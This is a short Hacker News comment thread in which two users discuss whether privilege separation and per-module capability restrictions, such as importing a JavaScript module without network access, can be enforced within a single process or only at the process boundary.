Comment by vlovich123

Comment by vlovich123 a day ago

2 replies

View on Hacker News

> instead differentiate between code I consider trusted and code I consider risky.

You’re talking about trying to enforce privilege separation within a single process? For that you’d need capabilities ant the language level and even then I’m skeptical you can really lock things down successfully within a shared memory environment (yes JS in theory is a VM but there’s so many VM escapes possible that running untrusted code in process seems futile).

dgellow 10 hours ago

I think so, yes. I would like to be able to say "import that module in no-network mode", if that makes sense (or the opposite, default imports to no fs, no network permissions, the grant explicitly).

Reply View 1 reply
  • vlovich123 5 hours ago

    Yeah this is particularly a problem for JS where importing code also immediately executes it. But yeah, managing capabilities within a process boundary is inherently trickier than doing it at the process boundary where you can actually guarantee permissions cannot be obtained through subterfuge.

    Reply View 0 replies